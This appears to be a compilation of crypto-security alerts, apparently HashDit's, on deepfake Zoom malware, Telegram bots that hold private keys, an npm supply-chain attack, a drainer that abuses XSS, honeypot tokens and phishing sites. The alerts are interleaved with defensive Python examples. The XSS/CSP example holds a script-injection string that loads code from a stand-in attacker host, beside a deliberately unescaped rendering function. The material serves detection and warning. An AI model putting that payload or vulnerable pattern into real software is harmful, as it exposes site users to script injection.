Warning: North Korean Threat Actors Use Deepfake Zoom Scams to Infect macOS and Drain Crypto Wallets
We have observed this occurring repeatedly in recent crypto security incidents (olaxbt & venus whale user). It will persist if we, as a crypto community, are not well informed! 😭 DPRK threat actors 🤖 continue to exploit this attack vector because many projects mistakenly believe their macOS systems are inherently more secure and remain unaware of sophisticated Zoom scams involving fake telecommunication devices. It is crucial for organizations to stay security-aware and vigilant.
"According to reports, DPRK threat actors stole a total of $1.5 billion USD in cryptocurrency during the first half of 2025."
These are the few RED flags 🚩 you should notice:
1. Received an unexpected DM from an account asking for a meeting call, especially on Telegram?
2. Is the account that reached out acting differently, or using a different TG handle?
3. Prompted to download or run a "security update" or fix for the "Zoom" software from a link they forwarded?
4. Inconsistencies in the voice, visuals or lighting of the person(s) during the meeting call?
It's time to CHANGE the mental model that macOS is inherently safer; it can also be targeted by malware. Think you might have been targeted, or have any other questions? Reach out to us now so we can assist!! Stay safe out there! #DPRK #Crypto #Security #Malware
Disclaimer: The financial figures provided here are accurate based on our monitoring system and on the USD amount of the cryptocurrency concerned at the time of the incident. Given the price volatility of cryptocurrencies, the total loss may differ under current token valuations. Furthermore, the financial figures may not fully reflect the true "exploited amount" of an incident. This applies in particular to scams, where the total amount stolen is typically mixed with an initial principal injected by the scam project's own party.
Critical Security Risks associated with Telegram Trading Bots
It began like any other late-night crypto experiment. A trader, eager to catch the next memecoin wave, opened Telegram, searched for BloomEVM (@BloomTrading), and followed the bot's instructions: "Create your wallet. Paste your token address. Let automation do the rest." Within seconds, the bot was trading: fast, smooth, and efficient. But behind that convenience hid a silent danger associated with centralized storage of your private keys.

The Promise of a Telegram Trading Bot
Telegram trading bots like BloomEVM promise to simplify crypto trading. They let users create or import wallets directly in Telegram, paste token addresses, and automate trades across chains. Everything happens within a friendly chat window, no coding or wallet plugins required.

Following the Data
To understand what really happens behind the screen, we traced BloomEVM's network traffic. The moment a user clicked Create Wallet, a series of HTTP requests lit up: not from the user's device to the blockchain, but between Telegram's web client and Bloom's backend servers. The discovery was unsettling:
- Wallets weren't being generated locally.
- The private keys were created on Bloom's servers and sent back to the user.
- When importing an existing wallet, private keys were transmitted to the same backend.
In other words, BloomEVM had full visibility and control over users' keys, despite publicly claiming that "Bloom will not store or retrieve your private key." The illusion of self-custody shattered.

The Technical Proof
Our analysts captured the key creation flow in detail. In the captured network requests, the backend responded with both the wallet address and its private key (see Fig. 1).

Fig. 1. The created private key is sent to the user's frontend and can be directly captured.

Contrary to Bloom's documentation, the private key never resided solely in the user's Telegram frontend. Instead, it lived on Bloom's servers, accessible to anyone controlling that infrastructure. This design wasn't just poor practice; it was a fundamental violation of self-custody principles. Even worse, the bot could execute transactions directly on behalf of users without requiring on-chain approvals. In effect, this is a delegation of full authority.

When Things Went Wrong
The risks weren't theoretical. In January 2025, a Solana user lost 1,068 SOL (≈ $2.1 million) in transaction fees after a trade routed through the Bloom Router. Community members debated whether the loss was due to a manual fee error or a bot-side vulnerability. Bloom never issued a formal response. And Bloom wasn't alone. The history of Telegram trading bots is littered with similar incidents:
- Banana Gun (Sept 2023): $3 million drained from 11 users via unauthorized wallet access.
- Maestro (Oct 2023): 280 ETH stolen after a smart contract flaw.
- Unibot (Oct 2023): $640k lost in a router contract exploit.
Each story told the same cautionary tale: convenience came at the price of control.

Why This Matters
Telegram bots blur the boundary between social app and financial terminal. Unlike decentralized applications, they operate through centralized servers. A single compromised backend could endanger thousands of users' wallets overnight. Yet, for many casual traders, that risk remains invisible behind the sleek chat interface.

What You Can Do
If you still choose to experiment with Telegram bots, treat them as untrusted intermediaries, not self-custodial tools. Security best practices include:
- Use a temporary wallet. Never connect your main wallet.
- Limit your funds. Only deposit what you can afford to lose.
- Withdraw profits quickly. Move them to a cold or main wallet.
- Revoke token approvals when done.
- Monitor wallet activity regularly through explorers.
These aren't guarantees, but they're your last defense against silent custody failures.

The Takeaway
The rise of Telegram trading bots like BloomEVM reflects a deeper trend: traders want simplicity. But when simplicity hides centralization, the convenience becomes an illusion of control. Our investigation reminds us that in crypto, custody equals trust, and trust, once misplaced, is impossible to reclaim.
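The traffic analysis above boils down to one check a user or auditor can repeat: does any request or response body carry a value shaped like a secp256k1 private key? The following is an added example (not HashDit's or Bloom's code) that runs that check over a captured exchange. The capture format (a list of records with a URL plus request and response bodies), the endpoint names and every key, address and hash in the sample are constructed placeholders.

```python
"""
Scan captured HTTP request/response bodies for values that look like
secp256k1 private keys. Added example, not HashDit's or Bloom's code: the
capture format and endpoint names are assumptions, and all sample values
are constructed.
"""
import json
import re

# A 32-byte scalar as 64 hex digits, optional 0x prefix, not part of a longer hex run.
HEX64 = re.compile(r"(?<![0-9a-fA-F])(?:0x)?([0-9a-fA-F]{64})(?![0-9a-fA-F])")

# secp256k1 group order; a valid private key is an integer in [1, N-1].
SECP256K1_N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141

# A transaction hash is also 64 hex digits, so the field name decides the severity.
KEY_FIELD_HINTS = ("privatekey", "private_key", "privkey", "secret", "seed", "mnemonic")


def is_plausible_private_key(hex_digits: str) -> bool:
    return 1 <= int(hex_digits, 16) < SECP256K1_N


def _leaves(obj, path=""):
    """Yield (json_path, value) for every scalar in a parsed JSON document."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from _leaves(value, f"{path}.{key}" if path else key)
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            yield from _leaves(value, f"{path}[{index}]")
    else:
        yield path, obj


def _candidates(body: str):
    # JSON bodies are walked field by field; anything else is scanned as raw text.
    try:
        return list(_leaves(json.loads(body)))
    except (json.JSONDecodeError, TypeError):
        return [("raw", body)]


def scan_record(record: dict) -> list:
    """Return findings for one request/response pair."""
    findings = []
    for direction in ("request", "response"):
        body = record.get(direction, {}).get("body", "")
        for path, value in _candidates(body):
            if not isinstance(value, str):
                continue
            for match in HEX64.finditer(value):
                if not is_plausible_private_key(match.group(1)):
                    continue
                field = path.rsplit(".", 1)[-1].lower()
                named = any(hint in field for hint in KEY_FIELD_HINTS)
                findings.append({
                    "url": record.get("url"),
                    "direction": direction,
                    "field": path,
                    "severity": "high" if named else "medium",
                })
    return findings


def scan_capture(records: list) -> list:
    return [finding for record in records for finding in scan_record(record)]


# Constructed capture modelled on the flow described above. Every value is fake.
SAMPLE_CAPTURE = [
    {   # backend mints the wallet and returns the key: the custody failure
        "url": "https://bot-backend.invalid/api/wallet/create",
        "request": {"body": json.dumps({"chain": "evm"})},
        "response": {"body": json.dumps({"address": "0x" + "ab" * 20,
                                         "privateKey": "0x" + "11" * 32})},
    },
    {   # user imports a wallet: the key travels to the server in the request
        "url": "https://bot-backend.invalid/api/wallet/import",
        "request": {"body": json.dumps({"private_key": "22" * 32})},
        "response": {"body": json.dumps({"ok": True})},
    },
    {   # benign: a tx hash is also 64 hex digits, hence only "medium"
        "url": "https://bot-backend.invalid/api/trade",
        "request": {"body": json.dumps({"token": "0x" + "cd" * 20})},
        "response": {"body": json.dumps({"txHash": "0x" + "cd" * 32})},
    },
]

if __name__ == "__main__":
    for finding in scan_capture(SAMPLE_CAPTURE):
        print(finding)
```

A "high" finding in a response to a wallet-creation call is exactly the Fig. 1 situation: the server knew the key before the user did. A "high" finding in a request to an import endpoint is the second finding in the article. The "medium" bucket exists because a bare 64-hex string is ambiguous; export such hits and confirm them by hand rather than suppressing them.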
Breaking: Popular npm package Tinycolor compromised in a supply-chain attack affecting more than 40 packages
Just last week we observed a recent supply-chain attack affecting billions of downloads on NPM, impacting dozens of widely used packages such as chalk, strip-ansi and color-convert. More details can be found here: https://jdstaerk.substack.com/p/we-just-found-malicious-code-in-the In this attack, the attackers target GitHub tokens and credentials in an attempt to compromise GitHub Actions workflows. Recommended actions: Audit your project's dependencies immediately for any affected packages.
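The recommended action is a dependency audit. The following is an added example (not the advisory author's or npm's code) that walks the "packages" map of a lockfileVersion 2 or 3 package-lock.json, reports every occurrence of the package names called out above, and flags tarballs resolved from anywhere other than the public registry. The embedded lockfile is constructed; its version strings and the "mirror.invalid" host are placeholders, and the affected version ranges (which this post does not list) must be taken from the linked write-up.

```python
"""
Audit an npm package-lock.json (lockfileVersion 2 or 3) for packages named in
a supply-chain advisory. Added example, not the advisory author's or npm's
code. The embedded lockfile is constructed; version numbers and the
"mirror.invalid" host are placeholders.
"""
import json
import sys

# Package names called out in the post. Affected versions are not given here,
# so every occurrence is reported for comparison against the advisory.
WATCHLIST = {"chalk", "strip-ansi", "color-convert"}
OFFICIAL_REGISTRY = "https://registry.npmjs.org/"


def package_name(lock_path: str) -> str:
    """'node_modules/a/node_modules/@scope/b' -> '@scope/b'."""
    return lock_path.rsplit("node_modules/", 1)[-1]


def audit_lockfile(lock: dict, watchlist=WATCHLIST) -> list:
    if lock.get("lockfileVersion", 0) < 2:
        raise ValueError("expected lockfileVersion 2 or 3 with a 'packages' map")
    hits = []
    for path, meta in lock.get("packages", {}).items():
        if path == "":
            continue  # the root project entry
        name = package_name(path)
        if name not in watchlist:
            continue
        resolved = meta.get("resolved", "")
        hits.append({
            "name": name,
            "version": meta.get("version"),
            "path": path,  # nested paths reveal which dependency pulled it in
            "dev": bool(meta.get("dev", False)),
            # A tarball fetched from anywhere but the registry deserves a look.
            "unexpected_source": bool(resolved) and not resolved.startswith(OFFICIAL_REGISTRY),
        })
    return sorted(hits, key=lambda h: (h["name"], h["path"]))


# Constructed lockfile; "0.0.0-placeholder" stands in for real versions.
SAMPLE_LOCK = json.loads("""
{
  "name": "demo-app", "lockfileVersion": 3,
  "packages": {
    "": {"name": "demo-app", "dependencies": {"chalk": "^5.0.0"}},
    "node_modules/chalk": {"version": "0.0.0-placeholder",
      "resolved": "https://registry.npmjs.org/chalk/-/chalk-0.0.0-placeholder.tgz"},
    "node_modules/color-convert": {"version": "0.0.0-placeholder", "dev": true,
      "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-0.0.0-placeholder.tgz"},
    "node_modules/some-cli/node_modules/strip-ansi": {"version": "0.0.0-placeholder",
      "resolved": "https://mirror.invalid/strip-ansi-0.0.0-placeholder.tgz"},
    "node_modules/left-pad": {"version": "0.0.0-placeholder"}
  }
}
""")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            lock = json.load(fh)
    else:
        lock = SAMPLE_LOCK
    for hit in audit_lockfile(lock):
        print(hit)
```

Run it against a real lockfile with `python audit.py package-lock.json` and compare the reported versions with the advisory; the nested path (here `node_modules/some-cli/node_modules/strip-ansi`) tells you which direct dependency to pin or replace.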
🚨 Hashdit Warning! 🚨 Scammers are planting trojans in apps downloaded to your iOS and Android devices. These can scan for images of cryptocurrency passwords or wallet seed phrases. Stay safe! 🔑 Key Lessons: 1. Download only from legitimate app stores (iOS Store or Google Play). 2. Ensure apps are from reputable developers. 3. Limit app permissions (e.g., restrict access to your image gallery). Stay vigilant and protect your digital assets! 💪
Introduction
HashDit has monitored a new Drainer As A Service (DaaS) product in the crypto scam industry, which calls itself Perpetual Drainer. Instead of the traditional approach of tricking a victim into visiting a scam/impersonation website, where security tools can block these sites at the wallet level, the victim visits a website hosting Perpetual Drainer, and the wallet then receives a request from a trusted origin, bypassing those checks.

Modus operandi
Perpetual Drainer redirects victims to a reflected XSS exploit on a trusted origin, which then dynamically loads a script from Perpetual Drainer infrastructure containing the actual drainer logic. When this code executes, it rewrites the DOM to display a wallet connection prompt and causes all requests to the wallet extension to originate from the trusted origin rather than the malicious one.

Technical Details
- Affiliates: Individuals or entities that help distribute the malicious tool.
- Main.js Script: Affiliates can include this script on their websites. When a user visits the site, this script automatically loads another script from a specific URL, which immediately redirects users to a site with a Cross-Site Scripting (XSS) vulnerability.
- XSS Domain: A domain that might appear trustworthy. The XSS vulnerability allows the attacker to execute malicious scripts in the user's browser.
- Drainer.js: Once the user is redirected to the XSS domain, this script (drainer.js) is loaded from another URL. It is the actual malicious code that performs the harmful actions.

** It is important to note that transaction simulation or transaction data analysis can still flag this malicious transaction. As always, stay paranoid and review your transactions before signing. If in doubt, always check with a trusted source. Protect yourself with our HashDit tool 🤖 download now for free!
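The chain above needs two things from the trusted origin: a reflected parameter that is written into the page unescaped, and no policy stopping the page from loading a script from foreign infrastructure. The following is an added example (not HashDit's code) showing, for a site operator, the vulnerable rendering beside its escaped form, and a deliberately simplified Content-Security-Policy matcher that shows why a `script-src 'self'` policy stops the drainer.js load even when reflection slips through. The origins, URLs and the injected string are constructed placeholders; the matcher handles only `'self'` and exact scheme://host entries, not the full CSP grammar.

```python
"""
Reflected-parameter rendering, vulnerable beside hardened, plus a simplified
CSP script-src check. Added example, not HashDit's code; all origins and URLs
are constructed placeholders, and the CSP matcher is intentionally minimal.
"""
import html
from urllib.parse import urlsplit


def render_search_vulnerable(query: str) -> str:
    # Reflects the parameter verbatim: anything in it is interpreted as markup.
    return f"<h1>Results for {query}</h1>"


def render_search_hardened(query: str) -> str:
    # Entity-encode before interpolating into HTML text content; quote=True
    # also covers the attribute context.
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


# Response header the trusted origin would send. Without a script-src
# directive the browser loads scripts from any host the page asks for.
CSP_HEADER = "script-src 'self'; object-src 'none'; base-uri 'none'"


def parse_script_src(csp: str) -> list:
    for directive in csp.split(";"):
        parts = directive.split()
        if parts and parts[0] == "script-src":
            return parts[1:]
    return []


def script_allowed(csp: str, page_origin: str, script_url: str) -> bool:
    """Simplified host-source matching: 'self' and exact scheme://host[:port]
    entries only (no wildcards, nonces, hashes or 'unsafe-inline')."""
    sources = parse_script_src(csp)
    if not sources:
        return True  # no script-src directive: nothing restricts the load
    parts = urlsplit(script_url)
    script_origin = f"{parts.scheme}://{parts.netloc}"
    for source in sources:
        if source == "'self'" and script_origin == page_origin:
            return True
        if source == script_origin:
            return True
    return False


# Constructed input standing in for a reflected query-string value that
# carries a script tag pointing at a foreign host.
INJECTED = '<script src="https://evil.invalid/x.js"></script>'
TRUSTED_ORIGIN = "https://trusted.example"


def demo() -> dict:
    return {
        "vulnerable_has_script_tag": "<script" in render_search_vulnerable(INJECTED),
        "hardened_has_script_tag": "<script" in render_search_hardened(INJECTED),
        "own_script_allowed": script_allowed(CSP_HEADER, TRUSTED_ORIGIN, TRUSTED_ORIGIN + "/app.js"),
        "foreign_script_allowed": script_allowed(CSP_HEADER, TRUSTED_ORIGIN, "https://evil.invalid/x.js"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Escaping removes the injection point; the policy is the second layer, which is why the post stresses that the wallet sees a trusted origin: the origin is genuine, so only the origin's own defences (output encoding, CSP) or transaction-level analysis can catch it.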
✍️ Our 2025 Q1 Incident Report for BNB Chain has been published! 1️⃣ Q1 sees a 75% decrease in fiat losses and 31% drop in incident count compared to 2024 Q4. 🛡️ 2️⃣ BSC ranks 5th in Q1 fiat losses among other chains. 🤝 3️⃣ Hot Wallet Compromises and Lack of Validation bugs were the most substantial exploits, with CEXs being the most targeted. 🐛 Read the full report here👇 https://hashdit.github.io/hashdit/blog/bsc-2025-quarter-one-report/
So, what is a HoneyPot Token? A HoneyPot token lures users with the promise of profits, but prevents them from selling their tokens later.

🎯 Usual Targets
- General Crypto Users: Little to no experience, follow influencers or pump groups, fall for marketing techniques, or buy fake tokens.
- Meme Coin Traders: Think they can make quick profits and get out fast despite suspicious aspects.

Did you know? 💡 Over 5,000 HoneyPots have been created this year alone! 🤯

💸 Why Users Buy
- Desire to make money fast
- Belief in getting in early
- Overconfidence in outsmarting the system
- Rushed decisions due to false urgency

FOMOing into a random Pump Signal token will get you REKT

🔍 How to Spot a HoneyPot Token
From the Chart: Mostly green candlesticks with the occasional red.
From the Code:
- Unverified contracts
- Ownership not renounced, or other privileged roles still controlled by scammers
- Blacklisting/whitelisting
- High sell fees
- Restricted transfers
- Balance manipulation to prevent selling
From Social Media:
- Check with other holders whether they have issues selling (verify that they are real users)
- Verify the official token address
Once you have bought into a HoneyPot, there is NO way to recover your funds❗ Anyone guaranteeing you that they can is a SCAM.
From Wallet: Randomly airdropped tokens with seemingly real names and value (there is NO free money in this world).
From Transactions:
- Multiple failed transactions (check chain explorers like BscScan)
- Predominantly buy transactions
From Holders:
- Large percentage of tokens held by few addresses
- CEX holders to mislead about listings (especially if it's a newly launched token)
- Unlocked liquidity (scammers can pull the rug anytime)

🛡️ How Users Can Protect Themselves
- Avoid impulsive investments
- Verify token address authenticity
- Conduct thorough due diligence (website, team, roadmap)
- Use security platforms like HashDit + Honeypot.is to verify code risk

🚨 If Caught in a HoneyPot Token, What Should You Do?
- It is unfortunate, but accept the loss and move on
- Report the contract on platforms like Token Sniffer and RugDoc
- Warn the community to break scammers' reliance on silence
- Revoke approvals to safeguard your wallet

Stay vigilant and protect your investments! 💵
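The "From Transactions" and "From Holders" checks are the ones that can be turned into numbers from explorer data: share of successful sells, share of failed transactions, and how much of the supply the top few addresses hold. The following is an added example (not HashDit's or Honeypot.is code) that computes those signals over a constructed swap log and balance table; the thresholds are assumptions to be tuned, and the addresses and amounts are made up.

```python
"""
Numeric honeypot signals from explorer-style data: sell share, failed-tx
share and top-holder concentration. Added example, not HashDit's or
Honeypot.is code; events, balances and thresholds are constructed.
"""
from collections import Counter


def transaction_signals(events, min_sell_share=0.10, max_failed_share=0.20) -> dict:
    """events: dicts with 'kind' in {'buy', 'sell'} and 'status' in {'ok', 'failed'}."""
    total = len(events)
    if total == 0:
        return {"sell_share": None, "failed_share": None, "flags": ["no activity"]}
    sells_ok = sum(1 for e in events if e["kind"] == "sell" and e["status"] == "ok")
    failed = sum(1 for e in events if e["status"] == "failed")
    failed_sells = sum(1 for e in events if e["kind"] == "sell" and e["status"] == "failed")
    sell_share = sells_ok / total
    failed_share = failed / total
    flags = []
    if sell_share < min_sell_share:
        flags.append("almost no successful sells")        # "predominantly buy transactions"
    if failed_share > max_failed_share and failed_sells:
        flags.append("many failed transactions, including sells")
    return {"sell_share": sell_share, "failed_share": failed_share, "flags": flags}


def holder_concentration(balances: dict, top_n=5) -> float:
    """Fraction of total supply held by the top_n addresses."""
    total = sum(balances.values())
    top = sum(amount for _, amount in Counter(balances).most_common(top_n))
    return top / total if total else 0.0


def honeypot_flags(events, balances, liquidity_locked: bool, max_concentration=0.5) -> list:
    flags = transaction_signals(events)["flags"]
    concentration = holder_concentration(balances)
    if concentration > max_concentration:
        flags.append(f"top holders control {concentration:.0%} of supply")
    if not liquidity_locked:
        flags.append("liquidity unlocked")
    return flags


# Constructed data: a token where nobody manages to sell and one deployer holds most supply.
SUSPECT_EVENTS = [{"kind": "buy", "status": "ok"}] * 7 + [{"kind": "sell", "status": "failed"}] * 3
SUSPECT_BALANCES = {"0xdeployer": 600, "0xa": 100, "0xb": 100, "0xc": 100, "0xd": 50, "0xe": 50}

# Constructed data: a token with two-way flow and a flat holder distribution.
HEALTHY_EVENTS = [{"kind": "buy", "status": "ok"}] * 5 + [{"kind": "sell", "status": "ok"}] * 5
HEALTHY_BALANCES = {f"0x{i:02x}": 100 for i in range(10)}

if __name__ == "__main__":
    print("suspect:", honeypot_flags(SUSPECT_EVENTS, SUSPECT_BALANCES, liquidity_locked=False))
    print("healthy:", honeypot_flags(HEALTHY_EVENTS, HEALTHY_BALANCES, liquidity_locked=True))
```

None of these signals proves a honeypot on its own (a brand-new token legitimately has few sells), which is why the post pairs them with code review and a simulation tool; treat several flags together as the reason to walk away.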
Summary: Always be wary of websites offering free tokens as an airdrop, or free tokens airdropped to your account that ask you to visit a website to claim them. We recently saw the site 'claimusdtbox' topping member interactions. Our advice: Stay away! It is a phishing site aiming to deprive you of your funds through scam contracts and deceptive functions. Keep your funds safe by protecting your wallet with the HashDit Chrome extension!! [https://chromewebstore.google.com/detail/hashdit/coegijljhiejhdodjbnlglffjomlbgmi]
The HashDit team noticed that the new website "ksc rocks" is seeing a rapid rise in interactions. Our advice: Stay away from this site! It appears to be a fake investment scam impersonating an investment and trading site with the aim of depriving you of your funds. Keep your funds safe by protecting your wallet with the HashDit Chrome extension!! [https://chromewebstore.google.com/detail/hashdit/coegijljhiejhdodjbnlglffjomlbgmi] #TrendingTopic #BTC #ETH #memecoin🚀🚀🚀 Concerning facts: The site provides no information about the project.
The HashDit team noticed that the website "eth-am.com" is trending upward in member interactions. Always do your due diligence before dealing with quick-investment sites. Our advice: Stay away! It is a phishing website aiming to deprive you of your funds via approval phishing. How this phish works: The site is set up to look like an automated trading platform combined with a staking aspect. As soon as you land on the page, it automatically requests a wallet connection. Clicking "Open" or interacting with the supposed trading page triggers the phishing process.
Always do your due diligence before interacting with any site claiming to let you easily earn passive/active income. We have seen an increase in interaction with the phishing site "defiminingfarm". Our advice: Stay away! It is a phishing website aiming to deprive you of your funds via approval phishing. #TrendingTopic #BTC #ETH #memecoin🚀🚀🚀 How this phish works: The site is set up to look like a globally active mining platform.
They falsely claim to be partnered with sites such as CMC, CoinGecko, etc. The site automatically requests a wallet connection as soon as the page loads.
The new website "mtcfund.io" has seen a rise in interactions. Our advice: Stay away! It appears to be a fake investment scam posing as a website aiming to deprive you of your funds. Keep your funds safe by protecting your wallet with the HashDit Chrome extension!! [https://chromewebstore.google.com/detail/hashdit/coegijljhiejhdodjbnlglffjomlbgmi] #TrendingTopic #BTC #ETH #memecoin🚀🚀🚀 Concerning facts: The site is poorly designed and none of the links actually work. They provide no information about the team or any documentation related to the project.
The HashDit team noticed a website "zedxion.site" aiming to phish users by claiming to be a presale fan token for "Chiliz Labs". Our advice: Stay away! It is a phishing scam!!! Scam contract [BSCScan]: 0x2a68Ef2850300e42dC2E7733a489C6f1aFFc3d1A We suggest using the HashDit Chrome extension to protect your wallet. [https://chromewebstore.google.com/detail/hashdit/coegijljhiejhdodjbnlglffjomlbgmi]
HashDit team noticed that a few new websites, "spccoin.in" and "spctoken.in", have been seeing a rise in interactions. Our Advice: Stay Away! It's a Fake Investment Scam posing as a staking website aiming to deprive you of your funds. Keep your funds safe by protecting your wallet with the HashDit Chrome Extension!! [https://chromewebstore.google.com/detail/hashdit/coegijljhiejhdodjbnlglffjomlbgmi] #BTC #ETH #TrendingTopic #memecoin🚀🚀🚀

Concerning Facts:
- They claim to be a token designed to offer various payment services for SPC ecosystem projects.
- They claim to provide two platforms to earn unlimited amounts.

Red Flags:
- To sign up you need to pay an activation fee [10 - 50 usdt].
- Once you sign up they promise you multiple sources of income.
- Direct Income: 5-10% of your direct referrals' activation fee.
- Level Income: requires a minimum activation of 30, up to 50 usdt.
- They also promise a direct sponsor bonus of 10% with up to 16 levels of referral.
- To round it off, they promise a staking bonus of .30% - .60%.
- This scheme is built around referring new members and having them purchase memberships.
- As soon as members stop joining or existing members stop funding the scheme, it will fall apart.
This is the hallmark of all Ponzi scams: promising very high returns but never actually providing any to anyone other than themselves.
Always #DYOR! Do not buy into projects that seem to promise unbelievable rewards!!
Always do your due diligence before interacting with sites claiming to offer airdrops of new tokens. We recently received a report regarding "base-brett.xyz" claiming to be the original and then actually stealing user funds. Our Advice: Stay Away! It's a Phishing website aiming to deprive you of your funds via approval phishing. Keep your funds safe by protecting your wallet with the HashDit Chrome Extension!! [https://chromewebstore.google.com/detail/hashdit/coegijljhiejhdodjbnlglffjomlbgmi] #BTC #TrendingTopic #ETH #memecoin🚀🚀🚀

How this phish works:
- The site is set up to look like the original and offers token presales/airdrops.
- Clicking on the "claim rewards" button launches a connect-wallet dialogue.
- The site then asks you to sign an approval with the spender being a contract.
- The scammer then makes a 'multicall' to the contract, resulting in a transferFrom call from the victim's address to the destination address(es) dictated by the scammer.
- This then leads to a loss of all tokens in the victim's wallet.
Contract: https://etherscan.io/address/0x0f2fcdb446FB157A684F51a970Dd88CEf6430B71
Eg tx: https://etherscan.io/tx/0xadf9684612d3dd0b3aaaedb9dd470076fc47437dff954333991c81b7d19d81b6
Always #DYOR! Do not buy into projects that seem to promise unbelievable rewards!!
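The approval-phishing flow above (and the one on eth-am.com and defiminingfarm) rests on two ERC-20 calls: the victim signs `approve(spender, amount)` for a contract they do not know, and the scammer later calls `transferFrom(victim, destination, amount)` against that allowance. The following is an added example (not HashDit's code) that decodes both from raw calldata, the way a wallet or a reviewer looking at "transaction data" would, and rates the approval against a list of spenders the user actually trusts. The selectors are the standard ERC-20 ones; the addresses, amounts and calldata in the sample are constructed placeholders, not the contract or transaction linked above.

```python
"""
Decode ERC-20 approve()/transferFrom() calldata and rate it against the
approval-phishing pattern. Added example, not HashDit's code; sample
addresses and calldata are constructed placeholders.
"""
from dataclasses import dataclass
from typing import Optional

SEL_APPROVE = "095ea7b3"        # keccak256("approve(address,uint256)")[:4]
SEL_TRANSFER_FROM = "23b872dd"  # keccak256("transferFrom(address,address,uint256)")[:4]
MAX_UINT256 = (1 << 256) - 1    # the "unlimited" allowance phishing pages ask for


@dataclass
class Finding:
    function: str
    risk: str
    reason: str
    spender: Optional[str] = None
    amount: int = 0


def _word(data: bytes, index: int) -> bytes:
    start = 4 + 32 * index
    chunk = data[start:start + 32]
    if len(chunk) != 32:
        raise ValueError(f"calldata too short for argument {index}")
    return chunk


def _address(word: bytes) -> str:
    if any(word[:12]):  # ABI left-pads addresses with 12 zero bytes
        raise ValueError("non-zero padding in address word")
    return "0x" + word[12:].hex()


def analyze_calldata(calldata_hex: str, tx_sender: str, trusted_spenders: set) -> Finding:
    data = bytes.fromhex(calldata_hex[2:] if calldata_hex.startswith("0x") else calldata_hex)
    selector = data[:4].hex()
    trusted = {s.lower() for s in trusted_spenders}

    if selector == SEL_APPROVE:
        spender = _address(_word(data, 0))
        amount = int.from_bytes(_word(data, 1), "big")
        if spender.lower() in trusted:
            return Finding("approve", "low", "allowance granted to a known spender", spender, amount)
        if amount == MAX_UINT256:
            return Finding("approve", "high", "unlimited allowance granted to an unknown spender", spender, amount)
        return Finding("approve", "medium", "allowance granted to an unknown spender", spender, amount)

    if selector == SEL_TRANSFER_FROM:
        source = _address(_word(data, 0))
        destination = _address(_word(data, 1))
        amount = int.from_bytes(_word(data, 2), "big")
        if source.lower() != tx_sender.lower():
            # Someone else's balance being pulled via an earlier approval: the drain step.
            return Finding("transferFrom", "high",
                           f"moves {source}'s tokens to {destination} using an allowance", None, amount)
        return Finding("transferFrom", "low", "sender moving their own tokens", None, amount)

    return Finding("unknown", "info", f"unrecognised selector 0x{selector}")


def encode_call(selector: str, *args) -> str:
    """Build calldata for static args: str = address, int = uint256 (test fixture helper)."""
    out = bytes.fromhex(selector)
    for arg in args:
        out += bytes(12) + bytes.fromhex(arg[2:]) if isinstance(arg, str) else arg.to_bytes(32, "big")
    return "0x" + out.hex()


# Constructed addresses; none of them is the contract on the page.
VICTIM = "0x" + "aa" * 20
UNKNOWN_CONTRACT = "0x" + "bb" * 20
KNOWN_ROUTER = "0x" + "cc" * 20

UNLIMITED_APPROVE = encode_call(SEL_APPROVE, UNKNOWN_CONTRACT, MAX_UINT256)  # what the claim page asks to sign
DRAIN_CALL = encode_call(SEL_TRANSFER_FROM, VICTIM, UNKNOWN_CONTRACT, 10 ** 21)  # the later pull
ROUTER_APPROVE = encode_call(SEL_APPROVE, KNOWN_ROUTER, 10 ** 18)               # a normal, bounded approval

if __name__ == "__main__":
    for label, calldata, sender in [("claim page approval", UNLIMITED_APPROVE, VICTIM),
                                    ("drain", DRAIN_CALL, UNKNOWN_CONTRACT),
                                    ("router approval", ROUTER_APPROVE, VICTIM)]:
        print(label, analyze_calldata(calldata, sender, {KNOWN_ROUTER}))
```

The "high" verdict on the approval is the moment to stop: once it is signed, the transferFrom that follows is valid by construction, which is why the post's only remedies after the fact are revoking approvals and moving what is left.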
Security alert: Beware of phishing sites imitating the popular "Hamster Kombat" project
The HashDit team noticed a series of fake sites, "allocation-hamster.com", ciaim-hamsterkombat.com and "claimhamster.pages.dev", aiming to phish users by targeting the popular new project "Hamster Kombat". Our advice: Stay away! It is a phishing scam!!! Actual social media links: Website: hamsterkombat.io Twitter/X: @hamster_kombat Telegram: t.me/hamster_kombat We suggest using the HashDit Chrome extension to protect your wallet. [https://chromewebstore.google.com/detail/hashdit/coegijljhiejhdodjbnlglffjomlbgmi]
TLDR: Beware of sites claiming to airdrop new tokens. We recently received a report regarding "basedbrett.claims" and "scotty-theai-io.web.app", which offer airdrops and claims but actually steal users' funds. Our advice: Stay away! These are phishing sites aiming to deprive you of your funds. Fake contract [BscScan]: 0x0000d169F98E078B60bFb09A69D145e72dBE0000 Keep your funds safe by protecting your wallet with the HashDit Chrome extension!! [https://chromewebstore.google.com/detail/hashdit/coegijljhiejhdodjbnlglffjomlbgmi]
TLDR: Token impersonation of popular, fast-rising projects is on the increase; we have seen a contract impersonating the recently launched Notcoin and using social media apps to trick users into buying it via PancakeSwap. Fake token (Notcoin - BSCSCAN): 0xc71f74b62d827638513d4eb90021527eed2c622c / 0x6f24daa874e65ab70b25bbb4f1fe8f4398ab893a Our advice: It is a scam! Always DYOR. This contract will steal your funds. We suggest using the HashDit Chrome extension to protect your wallet. [https://chromewebstore.google.com/detail/hashdit/coegijljhiejhdodjbnlglffjomlbgmi]